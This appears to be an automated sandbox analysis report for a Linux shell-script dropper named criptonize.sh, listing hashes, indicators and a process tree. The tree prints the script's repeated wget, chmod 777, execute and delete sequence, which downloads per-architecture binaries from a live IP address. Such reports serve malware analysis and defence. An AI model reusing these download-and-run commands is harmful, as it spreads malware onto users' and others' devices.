Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 827-08-2024 23:49
240827-3t1wkaxdpd 827-08-2024 23:47
240827-3svyxsxdlf 827-08-2024 23:45
240827-3rvlrsxdjc 3Analysis
-
max time kernel
61s -
max time network
65s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/criptonize.sh4 wget File opened for modification /tmp/criptonize.armv6l wget File opened for modification /tmp/criptonize.powerpc wget File opened for modification /tmp/criptonize.mips wget File opened for modification /tmp/criptonize.mipsel wget File opened for modification /tmp/criptonize.m68k wget File opened for modification /tmp/criptonize.arc700 wget File opened for modification /tmp/criptonize.aarch64 wget File opened for modification /tmp/criptonize.armv4l wget File opened for modification /tmp/criptonize.i486 wget File opened for modification /tmp/criptonize.armv5l wget File opened for modification /tmp/criptonize.armv4tl wget File opened for modification /tmp/criptonize.mips64 wget File opened for modification /tmp/criptonize.bsdamd64 wget File opened for modification /tmp/criptonize.x86_64 wget File opened for modification /tmp/criptonize.i586 wget File opened for modification /tmp/criptonize.armv4eb wget File opened for modification /tmp/criptonize.sparc wget File opened for modification /tmp/criptonize.i686 wget File opened for modification /tmp/criptonize.armv7l wget
Processes
-
/tmp/criptonize.sh/tmp/criptonize.sh1⤵PID:666
-
/bin/rmrm -f criptonize.x86_642⤵PID:667
-
-
/usr/bin/wgetwget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_642⤵
- Writes file to tmp directory
PID:670
-
-
/bin/chmodchmod 777 criptonize.x86_642⤵PID:698
-
-
/tmp/criptonize.x86_64./criptonize.x86_64 x86_642⤵PID:699
-
-
/bin/rmrm -f criptonize.x86_642⤵PID:701
-
-
/bin/rmrm -f criptonize.i6862⤵PID:702
-
-
/usr/bin/wgetwget -O criptonize.i686 http://212.60.5.174/criptonize.i6862⤵
- Writes file to tmp directory
PID:703
-
-
/bin/chmodchmod 777 criptonize.i6862⤵PID:704
-
-
/tmp/criptonize.i686./criptonize.i686 i6862⤵PID:705
-
-
/bin/rmrm -f criptonize.i6862⤵PID:707
-
-
/bin/rmrm -f criptonize.i5862⤵PID:708
-
-
/usr/bin/wgetwget -O criptonize.i586 http://212.60.5.174/criptonize.i5862⤵
- Writes file to tmp directory
PID:709
-
-
/bin/chmodchmod 777 criptonize.i5862⤵PID:740
-
-
/tmp/criptonize.i586./criptonize.i586 i5862⤵PID:741
-
-
/bin/rmrm -f criptonize.i5862⤵PID:745
-
-
/bin/rmrm -f criptonize.i4862⤵PID:746
-
-
/usr/bin/wgetwget -O criptonize.i486 http://212.60.5.174/criptonize.i4862⤵
- Writes file to tmp directory
PID:748
-
-
/bin/chmodchmod 777 criptonize.i4862⤵PID:756
-
-
/tmp/criptonize.i486./criptonize.i486 i4862⤵PID:757
-
-
/bin/rmrm -f criptonize.i4862⤵PID:760
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:761
-
-
/usr/bin/wgetwget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch642⤵
- Writes file to tmp directory
PID:762
-
-
/bin/chmodchmod 777 criptonize.aarch642⤵PID:780
-
-
/tmp/criptonize.aarch64./criptonize.aarch64 aarch642⤵PID:781
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:783
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:785
-
-
/usr/bin/wgetwget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l2⤵
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod 777 criptonize.armv7l2⤵PID:804
-
-
/tmp/criptonize.armv7l./criptonize.armv7l armv7l2⤵PID:806
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:807
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:808
-
-
/usr/bin/wgetwget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l2⤵
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod 777 criptonize.armv6l2⤵PID:811
-
-
/tmp/criptonize.armv6l./criptonize.armv6l armv6l2⤵PID:812
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:813
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:814
-
-
/usr/bin/wgetwget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l2⤵
- Writes file to tmp directory
PID:815
-
-
/bin/chmodchmod 777 criptonize.armv5l2⤵PID:816
-
-
/tmp/criptonize.armv5l./criptonize.armv5l armv5l2⤵PID:817
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:818
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:819
-
-
/usr/bin/wgetwget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb2⤵
- Writes file to tmp directory
PID:820
-
-
/bin/chmodchmod 777 criptonize.armv4eb2⤵PID:821
-
-
/tmp/criptonize.armv4eb./criptonize.armv4eb armv4eb2⤵PID:822
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:824
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:825
-
-
/usr/bin/wgetwget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl2⤵
- Writes file to tmp directory
PID:826
-
-
/bin/chmodchmod 777 criptonize.armv4tl2⤵PID:827
-
-
/tmp/criptonize.armv4tl./criptonize.armv4tl armv4tl2⤵PID:828
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:829
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:830
-
-
/usr/bin/wgetwget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l2⤵
- Writes file to tmp directory
PID:831
-
-
/bin/chmodchmod 777 criptonize.armv4l2⤵PID:835
-
-
/tmp/criptonize.armv4l./criptonize.armv4l armv4l2⤵PID:836
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:837
-
-
/bin/rmrm -f criptonize.mips642⤵PID:838
-
-
/usr/bin/wgetwget -O criptonize.mips64 http://212.60.5.174/criptonize.mips642⤵
- Writes file to tmp directory
PID:839
-
-
/bin/chmodchmod 777 criptonize.mips642⤵PID:842
-
-
/tmp/criptonize.mips64./criptonize.mips64 mips642⤵PID:843
-
-
/bin/rmrm -f criptonize.mips642⤵PID:845
-
-
/bin/rmrm -f criptonize.mips2⤵PID:846
-
-
/usr/bin/wgetwget -O criptonize.mips http://212.60.5.174/criptonize.mips2⤵
- Writes file to tmp directory
PID:847
-
-
/bin/chmodchmod 777 criptonize.mips2⤵PID:848
-
-
/tmp/criptonize.mips./criptonize.mips mips2⤵PID:849
-
-
/bin/rmrm -f criptonize.mips2⤵PID:851
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:852
-
-
/usr/bin/wgetwget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel2⤵
- Writes file to tmp directory
PID:853
-
-
/bin/chmodchmod 777 criptonize.mipsel2⤵PID:854
-
-
/tmp/criptonize.mipsel./criptonize.mipsel mipsel2⤵PID:855
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:857
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:858
-
-
/usr/bin/wgetwget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc2⤵
- Writes file to tmp directory
PID:859
-
-
/bin/chmodchmod 777 criptonize.powerpc2⤵PID:860
-
-
/tmp/criptonize.powerpc./criptonize.powerpc powerpc2⤵PID:861
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:863
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:864
-
-
/usr/bin/wgetwget -O criptonize.m68k http://212.60.5.174/criptonize.m68k2⤵
- Writes file to tmp directory
PID:865
-
-
/bin/chmodchmod 777 criptonize.m68k2⤵PID:868
-
-
/tmp/criptonize.m68k./criptonize.m68k m68k2⤵PID:869
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:871
-
-
/bin/rmrm -f criptonize.sh42⤵PID:872
-
-
/usr/bin/wgetwget -O criptonize.sh4 http://212.60.5.174/criptonize.sh42⤵
- Writes file to tmp directory
PID:873
-
-
/bin/chmodchmod 777 criptonize.sh42⤵PID:874
-
-
/tmp/criptonize.sh4./criptonize.sh4 sh42⤵PID:875
-
-
/bin/rmrm -f criptonize.sh42⤵PID:877
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:878
-
-
/usr/bin/wgetwget -O criptonize.sparc http://212.60.5.174/criptonize.sparc2⤵
- Writes file to tmp directory
PID:879
-
-
/bin/chmodchmod 777 criptonize.sparc2⤵PID:880
-
-
/tmp/criptonize.sparc./criptonize.sparc sparc2⤵PID:881
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:883
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:884
-
-
/usr/bin/wgetwget -O criptonize.arc700 http://212.60.5.174/criptonize.arc7002⤵
- Writes file to tmp directory
PID:885
-
-
/bin/chmodchmod 777 criptonize.arc7002⤵PID:886
-
-
/tmp/criptonize.arc700./criptonize.arc700 arc7002⤵PID:887
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:889
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:890
-
-
/usr/bin/wgetwget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd642⤵
- Writes file to tmp directory
PID:891
-
-
/bin/chmodchmod 777 criptonize.bsdamd642⤵PID:894
-
-
/tmp/criptonize.bsdamd64./criptonize.bsdamd64 bsdamd642⤵PID:895
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:897
-